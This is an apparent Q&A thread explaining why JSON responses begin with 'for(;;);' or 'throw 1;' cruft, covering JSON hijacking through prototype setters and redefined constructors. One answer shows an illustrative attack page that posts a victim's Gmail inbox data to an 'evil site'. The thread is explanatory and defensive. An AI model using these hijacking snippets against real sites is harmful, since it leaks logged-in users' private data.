Why do people put code like "throw 1; <dont be evil>" and "for(;;);" in front of json responses? [duplicate]

Possible Duplicate:
Why does Google prepend while(1); to their JSON responses?

Google returns JSON like this:

throw 1; <dont be evil> { foo: bar}

and Facebook's Ajax has JSON like this:

for(;;); {"error":0,"errorSummary": ""}
  • Why do they put in code that would stop execution and make the JSON invalid?
  • How do they parse it if it's invalid and would crash if you tried to eval it?
  • Do they just remove it from the string (seems expensive)?
  • Are there any security advantages to this?

In response to it being for security purposes:

If the scraper is on another domain, they would have to use a script tag to get the data, because XHR won't work cross-domain. Even without the for(;;); how would the attacker get the data? It's not assigned to a variable, so wouldn't it just be garbage collected because there are no references to it?

Basically, to get the data cross-domain they would have to do:

<script src="http://target.com/json.js"></script>

But even without the crash script prepended, the attacker can't use any of the JSON data unless it is assigned to a variable that is globally accessible (it isn't in these cases). The crash code effectively does nothing, because even without it they would have to use server-side scripting to use the data on their site.


Solution 1:

Even without the for(;;); how would the attacker get the data?

Attacks are based on altering the behaviour of the built-in types, in particular Object and Array, by altering their constructor function or its prototype. Then when the targeted JSON uses a {...} or [...] construct, they'll be the attacker's own versions of those objects, with potentially-unexpected behaviour.

For example, you can hack a setter property into Object that would betray the values written in object literals:

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

Then when a <script> was pointed at some JSON that used that property name:

{"x": "hello"}

the value "hello" would be leaked.

The way that array and object literals cause setters to be called is controversial. Firefox removed the behaviour in version 3.5, in response to publicised attacks on high-profile web sites. However at the time of writing Safari (4) and Chrome (5) are still vulnerable to this.
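As a rough illustration of the fixed behaviour, here is a minimal sketch assuming an ES5-or-later engine. It uses Object.defineProperty instead of __defineSetter__, and the names leaked, literal and assigned are made up for this example. An object literal defines its own property and skips the inherited setter, while an ordinary assignment still reaches it:

```javascript
// Record every value that reaches the setter on Object.prototype.
const leaked = [];
Object.defineProperty(Object.prototype, 'x', {
    configurable: true, // lets the demo remove the setter afterwards
    set: function (value) { leaked.push(value); }
});

// An object literal defines an own property and bypasses the inherited setter.
const literal = {"x": "hello"};

// A plain assignment walks the prototype chain and does call the setter.
const assigned = {};
assigned.x = "world";

// Clean up so later code is unaffected.
delete Object.prototype.x;
```

In such an engine only the assignment ends up in leaked, which is why a bare JSON literal loaded through a <script> tag no longer gives the value away this way.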

Another attack that all browsers now disallow was to redefine constructor functions:

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]
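To see why this no longer works, here is a small sketch, again assuming an ES5-or-later engine. Instead of overwriting the real global, it shadows the name Array inside a function (a substitution made for safety, not the original attack), and the names calls and buildLiteral are hypothetical:

```javascript
// Count how often the replacement constructor runs.
let calls = 0;

function buildLiteral() {
    // Shadow the name Array locally instead of overwriting the real global,
    // so the rest of the program is left untouched.
    var Array = function () { calls++; };
    return [1, 2, 3]; // the literal does not look up the name Array
}

const result = buildLiteral();
```

The literal is built by the engine's own array constructor, so calls stays at zero and the replacement function never sees the data.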

IE8's implementation of properties (based on the ECMAScript Fifth Edition standard and Object.defineProperty) currently does not work on Object.prototype or Array.prototype.

But as well as protecting past browsers, it may be that extensions to JavaScript cause more potential leaks of a similar kind in future, and in that case chaff should protect against those too.

Solution 2:

Consider that, after checking your Gmail account, you go visit my evil page:

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.stringify(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"></script>

What will happen now is that the JavaScript code that comes from Google, which the asker thought would be benign and immediately fall out of scope, will actually be posted to my evil site. Suppose that the URL requested in the script tag returns the following (because your browser will present the proper cookie, Google will correctly think that you are logged in to your inbox):

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

Now, I will be posting a serialized version of this object to my evil server. Thank you!

The way to prevent this from happening is to cruft up your JSON responses, and decruft them when you, from the same domain, can manipulate that data. If you like this answer, please accept the one posted by bobince.
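A minimal sketch of that round trip might look like the following. The for(;;); prefix is taken from the Facebook example in the question. The names CRUFT, addCruft and removeCruft are invented for this example, and JSON.parse is assumed to be available (it is in any ES5-or-later engine):

```javascript
// Assumed prefix; any string that makes the response unusable as a script would do.
const CRUFT = "for(;;);";

// Server side: serialize the data and put the cruft in front of it.
function addCruft(data) {
    return CRUFT + JSON.stringify(data);
}

// Client side (same origin): remove the cruft, then parse without eval.
function removeCruft(responseText) {
    if (!responseText.startsWith(CRUFT)) {
        throw new Error("Response is missing the expected prefix");
    }
    return JSON.parse(responseText.slice(CRUFT.length));
}

const wire = addCruft({ error: 0, errorSummary: "" });
const data = removeCruft(wire);
```

Only same-origin code can read the response text and strip the prefix. A cross-domain <script> tag has to execute the response as it is and gets stuck in the loop.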

Solution 3:

EDIT

These strings are commonly referred to as "unparseable cruft", and they are used to patch an information leakage vulnerability that affects the JSON specification. This attack is real-world: a vulnerability in Gmail was discovered by Jeremiah Grossman. Mozilla also believes this to be a vulnerability in the JSON specification, and it has been patched in Firefox 3. However, because this issue still affects other browsers, this "unparseable cruft" is required because it is a compatible patch.

bobince's answer has a technical explanation of this attack, and it is correct.

Solution 4:

How do they parse it if it's invalid and would crash if you tried to eval it?

It's a feature that it would crash if you tried to eval it. eval allows arbitrary JavaScript code, which could be used for a cross-site scripting attack.
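A quick way to check this, as a sketch only: the response string below is the Google-style example from the question with valid JSON after the cruft, and the helper fails is a name made up for this example.

```javascript
// The Google-style response from the question, with valid JSON after the cruft.
const response = 'throw 1; <dont be evil> {"foo": "bar"}';

// Report whether calling fn throws, without caring which error it is.
function fails(fn) {
    try { fn(); return false; } catch (e) { return true; }
}

// Neither eval nor a strict JSON parser accepts the raw response.
const evalFails = fails(function () { eval(response); });
const parseFails = fails(function () { JSON.parse(response); });
```

Both flags come out true, so code that forgets to strip the cruft fails immediately rather than silently evaluating the response.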

Do they just remove it from the string (seems expensive)?

I imagine so. Probably something like:

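function parseJson(json) {
   // Strip the known cruft prefix (a string pattern replaces only the first match).
   json = json.replace("throw 1; <dont be evil>", "");
   // isValidJson is a placeholder for the validation regex, which is not shown here.
   if (isValidJson(json)) {
       // Parentheses make eval treat {...} as an object literal, not a block.
       return eval("(" + json + ")");
   } else {
       throw new Error("XSS");
   }
}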

The "don't be evil" cruft prevents developers from using eval directly instead of a more secure alternative.